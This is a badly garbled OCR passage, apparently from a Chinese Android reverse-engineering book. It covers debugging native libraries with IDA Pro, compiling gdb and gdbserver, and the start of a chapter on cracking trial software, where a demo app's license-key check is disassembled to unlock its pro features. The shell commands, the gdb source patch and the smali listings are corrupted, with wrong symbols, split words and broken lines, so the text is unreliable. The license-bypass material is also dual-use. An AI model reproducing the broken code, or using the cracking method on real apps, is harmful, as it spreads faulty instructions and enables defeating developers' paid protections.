we — |  |]| | | | | | | LÁ - 
90008550 B8 Modules ax 
00008550 Path Base Size 
90008550 EXPORT start BB /aatu/1oesl/ tnp/ debugnativeapr 00008000 
00008550 start DB /systen/1ib/1iblog so AFAD0000 
1008550. RO, SP QO /systen/Lib/Litn. so AFBOOO00 
00008554 MOU R1, #0 GB /system/1ib/libstdett. so AECO0000 
980808558 ADR R2, sub_8564 QJ /systen/1ib/1ite. so AEDO0000 
00800855C ADR R3, unk_8568 DE /systen/bin/linker 30001000 00009000 
90808560 B .8hE 2 
80888568 ; End of Function start — 
80808560 (hj Threads 8x 
Decimal — Mex State 
[ero ne Ready 
100.00% (-329,-35) (722,7) UNKNOWN 00008558: start+8 
[C] Hex View-1 B8 X 问 Stack vier 8x 
BE93CFF& 67 6E 61 74 69 76 65 61 78 780 00 08 08 00 08 ugnatiueapp..... ^ BE93CCCe | ^ 
RFDADFFF 08 
[UNKNOWN BE93CFFO: [stack]:BE93CFFO M| UNKNOWN BESSCCCO: [stack]:BES3CCCO S| 
[E] Output. window 8x 
UniCodeString Ghdck. ws: could not load plugin ^ 
22:06:13 zymamics BinDiff 4.0.1 15146 (Dec 21 2011) - (c)2004-2011 Google Inc. 
L22:06: 13. Error: Could. naor lanad confiourartion. file. skinnina. nlunin. = 
nc 
AU: idle Dom Disk: 18GB 


图 8-15 IDA Pro 调 试 器 界面 


有 过 Windows 平 台 软 件 调试 经 历 的 读者 一 定 对 这 种 调试 界面 不 会 感到 阳 
生 ，Ollydbg 调 试 器 的 界面 布局 就 与 它 非常 相似 。 接 下 来 就 可 以 在 反 汇 编 代 
码 窗口 按 下 F7 (Step info) 或 F8 (Step over) 来 单 步 调试 原生 程序 了 。 


8.5.2. ”调试 Android 原 生动 态 链接 库 


调试 Android 原 生动 态 链接 库 需 要 先 安装 并 运行 包含 该 动态 链接 库 的 程 
序 。 然 后 使 用 IDA Pro 远 程 附 加 程序 进程 的 方式 来 进行 调试 。 安 装 本 小 节 的 
实例 程序 debugjniso.apk 并 运行 ， 界 面 如 图 8-16 所 示 。 点 击 * 设 置 标题 ”按钮 
后 ， 程 序 会 调用 动态 链接 库 libdebugjniso.so 中 的 jniString() 方 法 返回 一 个 字符 
串 ， 然 后 调用 setTitle() 方 法 设置 程序 的 标题 栏 。 现 在 我 们 的 需求 是 : 动态 调 
试 libdebugjniso.so 中 jniString0) 方 法 的 执行 过 程 。 


Ii 5554: Android2.3.3 


Debugjniso 


mp ng pog reg pom perg row pere mm 


Pe rem pm perm nq rr prem m peg rn 


a Ie IncissleIudlsledasdst 


m p pm p ^F ps -r 


2| 


图 8-16 ”Debugjniso 运 行 界面 


执行 以 下 命令 启动 IDA Pro 的 Android 调 试 服 务 器 。 

adb shell /data/local/tmp/android server 

命令 执行 成 功 后 会 监听 23946 端 口 ， 在 命令 行 下 执行 以 下 命令 进行 端口 
转发 。 

adb forward tcp:23946 tcp:23946 

启动 IDA Pro X fH, zd x 8 I "Debugger- Attach ^ Remote 
ArmLinux/Android debugger”， 打 开 调 试 程序 设置 对 话 框 。 在 HostName 一 栏 
中 输入 localhost， 如 图 8-17 所 示 。 


A Debug application setup: armlinux 


Debug options 


Hostname localhost Ww Port |23946 


Password v 


[C] Save network settings as default 


图 8-17 调试 程序 设置 对 话 框 


点 击 OK 按 钮 ，IDA Pro 会 连接 远程 的 Android 调 试 服务 器 ， 稍 等 片刻 ， 
IDA Pro 会 弹出 附加 进程 对 话 框 ， 如 图 8-18 所 示 。 


À Choose process to attach to 


com, android. protips 
/system/bin/vold 
/system/bin/netd 
com. android.music 
/system/bin/debuggerd 
com. android. mms 
/system/bin/rild 
zygote /bin/app process -Xzygote /system/bin --zygot:* 
com. android. email 
/system/bin/mediaserver 
f/system/bin/installd 
/system/bin/keystore /data/misc/keystore 
com. android. defcontainer 
/system/bin/qemud 
com. svox. pico 
f/system/bin/sh 
/ sbin/adbd 

415 /system/bin/sh -c "logcat -v long" 
logcat -v long 
/system/bin/sh -c /data/local/tmp/android server 
system server 


Line 30 of 34 


图 8-18 ”附加 进程 对 话 框 


为 了 确保 调试 器 附加 成 功 后 libdebugjniso.so 已 经 被 加 载 到 内 存 中 ， 此 时 
可 以 在 程序 中 点 击 一 次 “设置 标题 * 按 钮 来 让 系统 加 载 它 。 选 择 
com.droider.debugjniso 进 程 ， 点 击 OK 按钮 后 稍 等 片刻 IDA Pro 会 进入 调试 器 
界面 ， 但 此 时 的 代码 不 是 运行 在 动态 链接 库 的 领空， 要 想 调试 动态 链接 库 
还 得 为 动态 链接 库 中 的 函数 设置 断 点 。 将 debugjniso.apk 程 序 中 的 
libdebugjniso.so 文 件 解 讨 到 本 地 磁盘 ， 开 局 另 一 个 IDA Pro 实 例 并 载 入 它 ， 
找到 jniString0 方 法 的 代码 如 下 : 


.text:00000C38 Java_com_droider_debugjniso_TestJniMethods_jniString 


.text:00000C38 LDR R1, -(aFAxeNativemeth - 0xC4C) 
.text:00000C3C STMFD  SP!, {R4,LR} 

.text:00000C40 LDR R3, [R0] 

.text:00000C44 ADD Rl, PC, RI 

.text:00000C48 MOV LR, PC 

.text:00000C4C LDR PC, [R3,$0x29C] 

.text:00000C50 LDMFD SP!, {R4, PC} 


从 上 面 的 反 汇 编 代 码 中 可 以 看 出 ，jniString0) 方 法 的 代码 起 始 处 位 于 
0xC38， 回 到 IDA Pro 调 试 窗口 ， 按 下 快捷 键 CTRL+S 打 开 段 选择 对 话 框 ， 查 
找 libdebugjniso.so 动 态 链 接 库 的 基地 址 ， 笔 者 本 机 上 它 的 值 为 0x80500000， 
如 图 8-19 所 示 。 


|25] Choose segment to jump 


Hame Start End 

[a5] libdwm. so 80000000 80042000 
libdwm. so 50042000 80049000 
debug031 80049000 800ABODO 
libnfc ndef. so 80100000 80101000 
libnfc, ndef. so 80101000 80102000 
libstagefright en:** 80200000 80201000 
libstagefright en:*- 80201000 80202000 
Jibstagefright_fo… 80300000 80309000 
libstagefright fo:** 80309000 80304000 
gralloc. default. so 80400000 80402000 
gralloc. default. so 80402000 80403000 
libdebugjniso. so 80500000 80503000 
libdebugjniso. so 80503000 80504000 
libstlport. so 9n100000 90139000 
libstlport. so 90139000 30135000 
libjpeg. so 9DT00000 90732000 
libjpeg. so 90732000 30733000 
libstagefright.so A2FOONOO 3060000 
libstagefright.so A3060000 A306ADD0 


byte 
byte 
byte 
byte 
byte 
byte 
. byte public 


p) md vd np vd 5D DOLLE DU DU D vU d pO vd BO pd DD D bd 
BA P4 B4 P4 B4 BS PBAÍÓLOE B4 B B4 Bd B B4 B4 BA BA B4 BÀ B4 
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图 8-19 RARA EE 


根据 内 存 地 址 = 基地 址 + 偏 移 地 址 的 计算 方法 ， 可 以 得 出 jniString0 方 法 
的 内 存 地 址 为 0x80500c38。 点 击 界面 上 OK 或 Cancel 按 钮 关闭 段 选择 对 话 
框 ， 然 后 按 下 快捷 键 G， 打 开 地 址 跳 转 对 话 框 ， 在 “Jump Address” 一 栏 中 输 
入 0x80500c38， 如 图 8-20 所 示 。 


À Jump to address 


Jump address |90500c38 


图 8-20 “地址 跳 转 对 话 框 


点 击 OK 按 钮 后 ，IDA Pro 会 跳 转 到 jniStringO0 方 法 所 在 的 代码 行 ， 并 自 
己 分 析出 了 jniString() 方 法 的 代码 ， 在 0x80500c358 行 上 按 上 快捷 键 F2 设 置 一 
个 断 点 ， 此 时 被 设置 断 点 的 代码 行 会 以 红色 显示 ， 如 图 8-21 所 示 。 


À IDA - C:ADOCUNE IVADEINI^IALOCALS" |VTempVidal3778. idb (app process 


tal Enans 


Structures 


B X Ü eneral registers 


N ^| 
1 2z e g 
t | 
v | 
Methods jn. ing S lp a 5j 
SPt, (Rh,LR) 2 
y Y Base Sir ^| 
R1, PC, R1 Coon | 
LR, PC 80000000 m 
PC, [R3,80x29C] 
SP*, (Rh,PC) 
| of Function Java com droider debugjniso TestJniHet L] 
State 
Ready 
Ready 
stJniMethods jniString Ready 
Ready 
©] Mex B x (O|stek vie 8x 


7 Kex Viel 
BEACAFF@ [f] 70 70 5F 70 72 6F 63 65 73 73 00 00 00 00 00 app process..... EET MEODIESTUM [heap] :061F810 吉 
| BEACA28C 00000000 


M| UNKNOUN BEACA2B6: [stack ]:BEACA2B8 


图 8-21 ”使 用 IDA Pro 调 用 原生 动态 链接 库 


断 点 设置 好 后 ， 回 到 程序 中 点 击 * 设 置 标题 > 按钮， 程序 就 会 中 断 在 
0x80500c358 行 上 ， 接 下 来 的 调试 步骤 就 和 调试 原生 程序 是 一 样 了 。 


8.6 ”使 用 gdb 调 试 Android 原 生 程序 


本 小 节 将 介绍 在 没有 程序 源码 的 情况 下 ， 如 何 使 用 gdb 配 合 gdbserver 进 
行 Android 原 生 程序 的 汇编 级 调试 。 


8.6.1 ”编译 gdb 与 gdbserver 


Android 系 统 采用 gdb (The GNU Project Debugger，GNU 工 程 调试 器 ) 
作为 原生 程序 的 调试 器 ，Android NDK 根 目录 下 的 ndk-gdb 与 toolchains/arm- 
linux-androideabi-4.4.3/prebuilt/linux-x86/bin 目录 下 的 arm-linux-androideabi- 
gdb 都 可 以 用 来 调试 Android 原 生 程序 。 但 这 两 个 程序 是 动态 编译 的 ， 不 包含 
符号 信息 ， 调 试 时 需要 设置 Android 系 统 动态 链接 库 的 符号 加 载 路 径 ， 并 且 
只 能 调试 拥有 调试 信息 的 原生 程序 ， 而 一 般 情 况 下 ， 使 用 Android NDK 编 译 
的 原生 程序 都 不 包含 调试 信息 ， 因 此 无 法 使 用 官方 自 带 的 gdb 来 对 原生 程序 
进行 汇编 级 调试 。 

接 下 来 我 们 要 动手 编译 一 个 静态 版 本 的 gdb 调 试 器 。 首 先 到 gdb 的 官网 
下 载 gdb 的 源码 ， 笔 者 下 载 的 版 本 为 73.1， 下 载 地 址 为 : 
ftp://sourceware.org/pub/gdb/releases/gdb-7.3.1.tar.gz。 下 载 完 成 后 将 源码 解 
压 。 在 终端 提示 符 执行 以 下 命令 安装 编译 gdb 所 需 的 软件 包 。 

sudo apt-get install bison flex libncurses5-dev texinfo gawk libtool 

编译 gdb 时 不 要 使 用 自 带 的 多 线程 库 thread_db.c， 而 应 使 用 Android 
NDK 中 的 修改 版 本 ， 位 于 Android NDK 的 sources/android/libthread_db/gdb- 
7.3.x/libthread_db.c， 为 了 避免 兼容 性 问题 ， 笔 者 将 其 编译 成 了 静态 库 ， 配 
置 gdb 编 译 脚 本 如 下 (撰写 本 章 时 Android NDK 已 经 更 新 到 r8b 版 本 ， 该 版 本 
的 NDK 提 供 了 最 新 7.3.x 版 本 的 libthread_db.c 文 件 ， 笔 者 使 用 此 版 本 的 
Android NDK 编 译 gdb) 。 


export TOOLCHAIN PATH-/home/android/tools/android/ 
android-ndk-r8b/toolchains/arm-linux-androideabi-4.4.3/prebuilt/linux-x86 

export PATH-S$TOOLCHAIN PATH/bin:$PATH 

export SYSROOT-/home/android/tools/android/android-ndk-r8b/platforms/android-14/ 

arch-arm 

export TOOLCHAIN PREFIX-$TOOLCHAIN PATH/bin/arm-linux-androideabi 

export CC-"S$STOOLCHAIN PREFIX-gcc --sysroot-$SYSROOT" 

export AR-"STOOLCHAIN PREFIX-ar" 

$CC -o $SYSROOT/usr/lib/libthread db.o -c /home/android/tools/android/ 
android-ndk-r8b/sources/android/libthread db/gdb-7.3.x/libthread db.c 

SAR -r $SYSROOT/usr/lib/libthread db.a $SYSROOT/usr/lib/libthread db.o 

# 配 置 gdb 编 译 脚 本 

./configure --target-arm-elf-linux --enable-static --disable-stripping -with 

-libthread-db 
-$SYSROOT/usr/lib/libthread db.a 


“--target=arm-elf-linux” 指 定 了 被 调试 的 程序 运行 的 系统 平台 ,“--enable- 
static” 指 定 了 静态 编译 ，“--disable-stripping” 指 定 禁 止 剥 离 符 号 信息 ，“-- 
with-libthread-db” 手 动 指定 多 线程 库 文件 。 笔 者 的 编译 环境 为 Ubuntu 
10.04， 在 终端 提示 符 下 依次 执行 以 上 命令 后 会 生成 makefile 文 件 ， 接 下 来 还 
需要 手动 修改 gdb-7.3.1/gdb 目 录 下 的 remote.c 文 件 。 找 到 process_g_packet0) 逻 
数 的 代码 ， 将 以 下 的 内 容 : 

if (buf len > 2 * rsa-»sizeof g packet) 

error ( ("Remote 'g' packet reply is too long: $s"), rs-»buf); 


修改 为 : 
if (buf len > 2 * rsa-»sizeof g packet) ( 
rsa-»sizeof g packet = buf len; 
for (i = 0; i < gdbarch num regs (gdbarch); i++) ( 
if (rsa-»regs[i].pnum -- -1) 
continue; 


if (rsa-»regs[i].offset >= rsa-»sizeof g packet) 


rsa-»regs[i].in g packet = 0; 
else 
rsa-»regs[i].in g packet = 1; 


修改 完成 后 保存 退出 ， 在 终端 提示 符 下 执行 make 命 令 开 始 编译 gdb， 稍 
等 片刻 就 会 在 gdb-7.3.1/gdb 目 录 下 生成 gdb 可 执行 程序 。 

单独 使 用 gdb 还 不 能 调试 Android 原 生 程 序 ， 还 需要 编译 gdbserver。 
gdbserver 的 源码 位 于 gdb-7.3.1/gdb/gdbserver 目 录 ， 在 终端 提示 符 下 进入 此 目 
录 依 次 执行 以 下 命令 来 配置 gdbserver 编 译 脚本 。 


export CC="$TOOLCHAIN PREFIX-gcc --sysroot-$SYSROOT" 

export CFLAGS-"-O2 -D ANDROID | -DANDROID -DSTDC HEADERS -D  GLIBC ^" 
./configure --host-zarm-linux-androideabi --with-libthread-db-$SYSROOT/ 
usr/lib/libthread db.a 


命令 执行 完成 后 会 在 gdb-7.3.1/gdb/gdbserver 目 录 下 生成 makefile 文 件 ， 
打开 该 文件 找到 WERROR_CFLAGS 的 定义 ， 将 它 的 值 清 空 ， 然 后 打开 
config.h X {F , ¥§ “/* #undef HAVE LWPID T */ PX 为 “#define 
HAVE_LWPID_T 1”， 修 改 完成 后 保存 退出 ， 然 后 在 终端 提示 符 下 执行 make 
命令 开始 编译 gdbserver， 稍 等 片刻 就 会 在 gdb-7.3.1/gdb/gdbserver 目 录 下 生成 
gdbserver 可 执行 程序 。 

将 gdb 与 gdbserver 复 制 一 份 出 来 ， 以 备 下 一 小 节 使 用 ， 本 书 的 配套 源 代 
码 中 提供 了 编译 好 的 gdb7.3 与 gdb7.5 的 可 执行 文件 ， 读 者 在 使 用 前 ， 需 要 按 
照 前 面 的 步骤 安装 好 gdb 所 需 的 软件 包 。 


8.6.2 ”如 何 调试 


本 小 节 采 用 8.5.1 节 的 debugnativeapp 程 序 作为 演示 实例 。 在 终端 提示 符 
下 执行 以 下 两 条 命令 将 debugnativeapp 与 gdbserver 复 制 到 Android 设 备 
的 /data/local/tmp 目 录 。 

adb push debugnativeapp /data/local/tmp 

adb push gdbserver /data/local/tmp 

执行 以 下 两 行 命令 给 两 个 文件 加 上 可 执行 权限 。 

adb shell chmod 755 /data/local/tmp/debugnativeapp 

adb shell chmod 755 /data/local/tmp/gdbserver 


接 着 DU 行 “adb shell/data/local/tmp/gdbserver :12345 


一 一 


/data/local/tmp/debugnativeapp”， 启 动 gdb 调 试 服务 器 ， 会 输出 如 下 信息 。 


终 


一 一 


Process /data/local/tmp/debugnativeapp created; pid = 292 
Listening on port 12345 


程序 提示 调试 服务 器 已 经 启动 ， 并 且 监 听 了 12345 号 端口 。 打 开 另 一 个 


端 窗口 执行 以 下 命令 开启 端口 转发 。 


adb forward tcp:12345 tcp:12345 
在 PC 端的 终端 提示 符 下 执行 ./gdb 启 动 gdb 调 试 器 ， 然 后 执行 以 下 命令 连 


接 gdb 调 试 服务 器 。 


target remote localhost:12345 


命令 执行 后 会 有 如 下 输出 。 

(gdb) target remote localhost:12345 

Remote debugging using localhost:12345 

warning: Can not parse XML target description; XML support was disabled at 
compile time 

0xb0001000 in ?? () 

(gdb) 


使 用 IDA Pro 或 objdump 找 到 程序 main0 国 数 的 地 址 ， 本 实例 为 0x8580。 


在 gdb Shell 环 境 下 执行 命令 “b *0x8580” 在 main0 函 数 的 第 一 行 上 设置 断 点 ， 
输出 信息 如 下 。 


(gdb) b *0x8580 

Breakpoint 1 at 0x8580 

(gdb) 

断 点 设置 完成 后 输入 continue 让 程序 继续 执行 。 输 出 信息 如 下 。 
(gdb) continue 

Continuing. 

Program received signal SIGSEGV, Segmentation fault. 
0x00008584 in ?? () 


执行 “set disassemble-next on” 设 置 反 汇编 显示 代码 ， 然 后 执行 “disas 


0x8580,+20” 显 示 0x8580 以 下 20 个 字符 的 反 汇 编 代 码 ， 输 出 信息 如 下 。 


(gdb) disas 0x8580,+20 
Dump of assembler code from 0x8580 to 0x8594: 
0x00008580: ldr r0, [pc 


| 
V 


0x00008584: push 


(r4 


0x00008588: add r0, pc, 
0x0000858c: bl 0Ox84f8 
0x00008590: mov r0, #0 


End of assembler dump. 


(gdb) 


接 下 来 可 以 输入 si 或 ni 命令 来 单 步调 试 了 ， 也 可 以 输入 i 
gdb 命 令 进 行 调试 。 整 个 调试 界面 如 图 8-22 所 示 。 


, $416] 
5 a 5 
ro 


$0 6 android@honeynet: ~/gdb-7.3.1/gdb 


File Edit View Terminal Help 


(gdb) continue 
Continuing. 


Program received signal SIGSEGV, Segmentation fault. 


0x00008584 in ?? () 
(gdb) set disassemble-next on 
(gdb) disas 0x8580,-420 


Dump of assembler code from 0x8580 to 0x8594: 


0x00008580: ldr r0, [pc, 
=> 0x00008584: push {r4, lr} 


0x00008588: add rð, pc, 
0x0000858c: bl 0x84f8 


0x00008590: mov ro, #0 

End of assembler dump. 

(gdb) info registers 

" 0x1 1 
0xbea33cc4 
0xbea33ccc 
0x4000800c 
0x8564 34148 
0x1 H 
0xafd41504 
0xbea33ccc 
0x0 0 


#16] 


rg 


3198368964 
3198368972 
1073774604 


2949911812 
3198368972 


; 0x8598 


, 


0x8598 


图 8-22 ”使 用 gdb+gdbserver 调 试 Android 原 生 程 序 


9.7 ”本 章 小 结 
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本 章 主要 介绍 了 动态 调试 Android 程 序 的 方法 。Android 程 序 的 调试 分 为 
普通 程序 与 原生 程序 的 调试 ， 宏 观 上 可 以 理解 为 Java 程 序 与 C/C++ 程序 的 调 
试 。Java 程 序 在 没有 源码 的 情况 下 调试 起 来 比较 困难 ， 只 能 通过 调试 器 获得 
十 分 有 限 的 进程 信息 。 另 外 ， 笔 者 将 实际 分 析 过 程 中 的 一 些 调试 技巧 总 结 
成 了 三 种 定位 关键 代码 的 方法 ， 它 们 分 别 是 代码 注入 法 、 栈 跟踪 法 与 
Method Profiling， 使 用 这 三 种 方法 能 够 解决 调试 Android 程 序 时 遇 到 的 大 多 
数 问题 。 最 后 ， 笔 者 介绍 了 如 何 使 用 IDA Pro 与 gdb 调 试 器 来 对 Android 原 生 
程序 进行 汇编 级 调试 ， 笔 者 认为 这 种 调试 方法 必须 要 牢 牢 掌握 ， 因 为 在 实 
Es DER, ASBJARMCGLASISASESEXETE, 38 UT ZZ SE B (82 Du] S8 JR 
难以 分 析 ， 这 种 情况 下 静态 分 析 已 无 用 武之 地 ， 只 能 采用 动态 调试 的 方法 
寻找 突破 口 。 


第 9 章 ” Android 软件 的 破解 技术 


本 章 将 介绍 Android 平 台 上 形形色色 的 商业 软件 所 使 用 的 保护 手段 ， 以 
及 针对 它们 的 破解 方法 。 在 开始 阅读 前 ， 读 者 应 该 明确 自己 的 学 习 目的 与 
用 途 ， 本 章 介绍 的 内 容 不 是 教 读者 如 何 去 破 解 别 人 开发 的 软件 ， 而 是 让 更 
多 的 人 能 够 了 解 到 软件 破解 的 本 质 ， 只 有 从 根本 上 了 解 了 这 种 技术 ， 才 能 
更 好 地 保护 自己 的 劳动 成 果 。 


9.1 ”试用 版 软件 


免费 试用 版 软件 是 Android 平 台 上 比较 常见 的 一 种 商业 软件 ， 这 种 软件 
的 自我 保护 能 力 一 般 较 弱 ， 通 常 可 以 手动 破解 掉 。 


9.1.1 ”试用 版 软件 的 种 类 


Android 平 台 的 试用 版 软件 大 致 可 以 分 为 三 类 : 免费 试用 版 、 演 示 版 与 
限制 功能 免费 版 。 

免费 试用 版 的 软件 通常 有 一 个 免费 使 用 期 限 或 次 数 的 限制 ， 当 达到 了 
使 用 期 限 或 软件 的 免费 次 数 使 用 完 后 ， 软 件 会 提示 软件 免费 试用 过 期 ， 然 
后 提醒 用 户 购买 软件 。 

演示 版 软件 一 般 只 提供 了 软件 的 部 分 功能 供用 户 使 用 ， 此 类 软件 通 单 
是 “免费 ”的 ， 用 户 要 想 使 用 软件 的 全 部 功能 则 需要 向 软件 作者 购买 正式 版 
的 软件 ， 作 者 会 提供 完整 版 的 安装 包 及 使 用 授权 。 

限制 功能 免费 版 的 软件 通常 将 软件 根据 功能 分 成 几 个 级 别 ， 例 如 免费 
版 、 高 级 版 、 专 业 版 等 。 免 费 版 只 提供 最 基础 的 功能 ， 而 专业 版 或 高 级 版 
则 提供 更 多 或 者 全 部 的 软件 功能 ， 根 据 作 者 的 授权 风格 不 同 ， 这 三 种 级 别 


的 软件 可 能 使 用 同一 个 软件 安装 包 ， 通 过 不 同 的 授权 来 区 别 使 用 权限 ， 或 
者 使 用 不 同 的 安装 包 提供 不 同 的 软件 功能 。 


9.1.2 ”实例 破解 一 一 针对 授权 KEY 方 式 的 破解 


破解 试用 版 软件 的 前 提 是 试用 版 软件 中 提供 了 软件 的 完整 功能 ， 否 
则 ， 即 使 解除 了 软件 的 授权 限制 也 无 法 使 用 完整 的 功能 ， 就 失去 了 破解 的 
意义 。 

本 实例 的 演 示 程 序 为 一 个 限制 功能 免费 版 程序 ， 提 供给 普通 用 户 的 只 
有 免费 版 功能 ， 软 件 运 行 界面 如 图 9-1 所 示 。 用 户 可 以 向 软件 作者 购买 高 级 
版 或 专业 版 的 使 用 授权 ， 作 者 将 会 给 用 户 提 供 一 个 拥有 授权 KEY 的 apk 文 
件 ， 当 用 户 安装 授权 文件 后 ， 即 可 使 用 高 级 版 或 专业 版 的 全 部 功能 。 


Android 安 全 软件 免费 版 
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图 9-1 ”限制 功能 免费 版 演示 程序 
安装 专业 版 的 授权 KEY 后 ， 运 行 本 软件 界面 如 图 9-2 所 示 。 


Android 安 全 软件 专业 版 


图 9-2 ”安装 专业 版 授权 KEY 后 软件 的 运行 界面 


我 们 现在 的 需求 是 : 不 安装 授权 KEY， 使 用 软件 专业 版 的 所 有 功能 。 

既然 软件 可 以 通过 授权 KEY 来 使 用 不 同 的 功能 ， 说 明 软 件 本 身 是 拥有 
完整 功能 代码 的 ， 只 是 使 用 一 些 手段 “隐藏 * 起 来 了 。 下 面 我 们 反 编译 实例 
程序 freeapp.apk， 查 找到 OnCreate() 方 法 中 程序 初始 化 的 反 汇编 代码 如 下 。 


.method public onCreate(Landroid/os/Bundle;)V 
.locals 4 
.parameter "savedInstanceState" 
.prologue 
const/4 v3, 0x0 
.line 24 
invoke-super {p0, p1}, Landroid/app/Activity;- -»onCreate(Landroid/os/ 
Bundle;)V 
.line 25 
const/highl6 v2, 0x7f03 
invoke-virtual (p0, v2), Lcom/droider/free/MainActivity;-»setContent 
-View(I)V 
.line 27 
const/4 v0, 0x0 
.line 28 
.local v0, resID:I  &resID = 0 
invoke-direct {p0}, Lcom/droider/free/MainActivity;-»checkappKey()Z 


# 调 用 checkappKey () 

move-result v2 

if-nez v2, :cond 2 # 结 果 不 为 0 则 跳 转 到 cona_2 标 号 处 
.line 29 

const v0, 0x7f040001 # 字 符 串 ID“anaroia 安 全 软件 免费 版 ” 
.line 35 

:cond 0 # 通 过 appKey 解 密 所 得 的 int 值 获取 字符 串 

:goto_0 


invoke-virtual (p0, v0), Lcom/droider/free/MainActivity;->getstring(I)Ljava/ 
lang/String; 

move-result-object v1 

.line 36 

.local v1, titleString:Ljava/lang/String; 

invoke-virtual (p0, v1), Lcom/droider/free/MainActivity;-»setTitle 
(Ljava/lang/CharSequence;)V 

.line 50 

const v2，0x7f040002# 字 符 串 TD“Android 安 全 软件 高 级 版 ” 


if-ne v0, v2, :conà 3  # 如 果 不 为 高 级 版 就 跳 转 到 cond_3 标 号 处 

.line 51 

iget-object v2, p0, Lcom/droider/free/MainActivity;-»btn advanced: 
Landroid/widget/Button; 

invoke-virtual (v2, v3), Landroid/widget/Button;-»setVisibility(I)V 
# 开 启 高 级 版 功能 


.line 57 


.line 86 


return-void 


.line 31 
.end local v1 dtitleString:Ljava/lang/String; 
:cond 2 # 检 测 到 已 安装 appKey， 获 取 解 密 int 值 


const v2，0x7f030001# 解 密 因子 ， 通 过 v2 的 值 获取 appKey 

invoke-direct (p0, v2), Lcom/droider/free/MainActivity;-»getAppKey (I) 
Ljava/lang/String; 

move-result-object v2 

invoke-direct {p0, v2), Lcom/droider/free/MainActivity;-»decryptAppKey 
(Ljava/lang/String;)1 

move-result v0 sf ;appKey 

.line 32 

if-nez v0, :cond O # 如 果 解 密 成 功 就 跳 转 到 cona_0 标 号 处 

.line 33 

const v0，0x7f040001# 字 符 串 ID“android 安 全 软件 免费 版 ”， 说 明 解密 失败 


goto :goto_0 


.line 52 
.restart local vi d&titleString:Ljava/lang/String; 
:cond 3 # 比 较 是 否 为 专业 版 


const vV2，0x7f040003# 字 符 串 ID“android 安 全 软件 专业 版 ” 

if-ne v0, v2, :cond 1 

.line 53 

iget-object v2, p0, Lcom/droider/free/MainActivity;-»btn advanced: 

Landroid/widget/Button; 

invoke-virtual (v2, v3), Landroid/widget/Button;-»setVisibility(I)V 

# 开 启 高 级 版 功能 

.line 54 

iget-object v2, p0, Lcom/droider/free/MainActivity;-»btn pro:Landroid 
/widget/Button; 
invoke-virtual (v2, v3), Landroid/widget/Button;-»setVisibility(I)V 
# 开 启 专 业 版 功能 
goto :goto 1 

.end method 


这 段 代 码 调用 checkappKey0O 判 断 本 机 是 否 安装 了 授权 KEY， 如 果 没 
安装 就 设置 软件 为 “免费 ”版 ， 反 之 则 跳 转 到 cond_2 标 号 处 获取 解密 后 的 int 
值 ， 最 后 根据 它 的 值 来 判断 软件 的 版 本 类 型 。 

接 下 来 看 看 checkappKey0 的 反 汇 编 代 码 。 


.method private checkappKey()Z 
.locals 2 
.prologue 
.line 89 
const v1, 0x7f£030001 # 解 密 因 子 
invoke-direct (p0, v1), Lcom/droider/free/MainActivity;-»getAppKey(I) 


Ljava/lang/String; 
move-result-object v0 
.line 90 
.local v0, appKey:Ljava/lang/String; 
if-eqz v0, :cond 0 # 如 果 获 取 appKey 失 败 则 返回 0 
invoke-virtual (v0), Ljava/lang/String;-»length()I 
move-result vi # appKey 的 长 度 不 能 为 0 
if-nez v1, :cond 1 
.line 91 
:cond O0 
const/4 v1, 0x0 
.line 93 
:goto O0 
return v1 # 返 回 失败 
:cond 1 
const/4 vi, 0x1 # 返 回 成 功 
goto :goto_0 
.end method 


checkappKeyO 只 是 调用 了 getAppKey0， 后 者 的 反 汇 编 代 码 如 下 。 


.method private getAppKey(I)Ljava/lang/String; 
.locals 5 
.parameter "resId" 
.prologue 
.line 96 
const-string v2, "" 
.line 98 
.local v2, result:Ljava/lang/String; 
:try start, 0 
const-string v3, "com.droider.appkey" 
.line 99 
const/4 v4, 0x2 
.line 98 
invoke-virtual (p0, v3, v4), Lcom/droider/free/MainActivity; 

-»createPackageContext (Ljava/lang/String;I)Landroid/content/Context; 

move-result-object v0  # 获 取 com.droider .appkey 软 件 包 的 context 
.line 100 
.local v0, context:Landroid/content/Context; 
invoke-virtual (v0, p1}, Landroid/content/Context;-»getString(I)Ljava/ 
lang/String; 
:try end O0 
.catch Ljava/lang/Exception; (:try start O0 .. :try end 0) :catch O0 
move-result-object v2  # 调 用 context 的 getstring () 
.line 105 
.end local v0 #context :Landroid/content/Context; 
:goto_0 
return-object v2 
.line 101 
:catch 0 
move-exception v1 
.line 102 
.local vi, e:Ljava/lang/Exception; 
invoke-virtual {v1}, Ljava/lang/Exception;-»printStackTrace()V 
.line 103 
const-string v2, "" 
goto :goto 0 

.end method 


这 段 代 码 是 整个 程序 检测 授权 KEY 的 核心 。 转 换 成 Java 代 码 为 : 


private String getAppKey(int resId) { 
String result - "' 
try ( 
Context context - MainActivity.this.createPackageContext ("com.droider. 
appkey", 
Context.CONTEXT IGNORE SECURITY); 
result - context.getString(resId); 
) catch (Exception e) ( 
e.printStackTrace(); 
result = "" 


} 
return result; 


) 

回顾 一 下 学 习 Android 软 件 开 发 的 知识 ，createPackageContext() 方 法 的 作 
用 是 什么 ? 这 个 方法 可 以 创建 其 它 程序 的 Context， 通 过 这 个 Context 可 以 访 
问 其 它 软件 包 的 资源 ， 甚 至 可 以 执行 其 它 软 件 包 的 代码 。 但 这 个 方法 可 能 
抛 出 java.lang.SecurityException 异 常 ， 这 个 异常 为 安全 异常 ， 通 常 一 个 软件 

不 能 够 创建 其 它 程序 Context 的 ， 除 非 它 们 拥有 相同 的 用 户 ID 与 签名 。 用 
户 ID 是 一 个 字符 串 标识 ， 在 程序 AndroidManifest,xml 文 件 的 manifest 标 签 中 
指定 ， 格 式 为 android:sharedUserId="xxx.xxx.xxx"， 当 两 个 程序 中 指定 了 相 
同 的 用 户 ID 时 ， 这 两 个 程序 将 运行 在 同一 个 进程 空间 ， 它 们 之 间 的 资源 此 
时 可 以 相互 访问 ， 如 果 它 们 的 签名 也 相同 的 话 ， 还 可 以 相互 执行 软件 包 之 
间 的 代码 。 

在 通过 Context 获 取 字 符 串 (也 就 是 实例 的 appKey) 后 ， 接 着 调用 
decryptAppKey0 方 法 对 该 字符 串 解密 。 如 果 解 密 失 败 说 ee 
效 ， 此 时 程序 仍然 会 以 “免费 ”模式 运行 。 

现在 整个 授权 的 机 制 算是 明白 了 。 实 例 程 序 com.droider.free 与 授权 KEY 
程序 com.droider.appkey 使 用 相同 的 用 户 ID， 当 实例 程序 启动 时 ， 获 取 授 权 
